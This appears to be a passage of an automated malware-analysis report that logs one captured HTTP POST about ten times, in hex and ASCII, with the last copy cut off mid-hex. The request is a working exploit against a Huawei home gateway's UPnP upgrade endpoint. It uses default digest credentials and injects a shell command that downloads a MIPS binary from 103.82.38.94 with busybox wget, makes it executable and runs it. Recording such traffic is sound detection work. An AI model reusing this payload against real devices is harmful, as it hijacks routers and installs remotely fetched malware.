              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 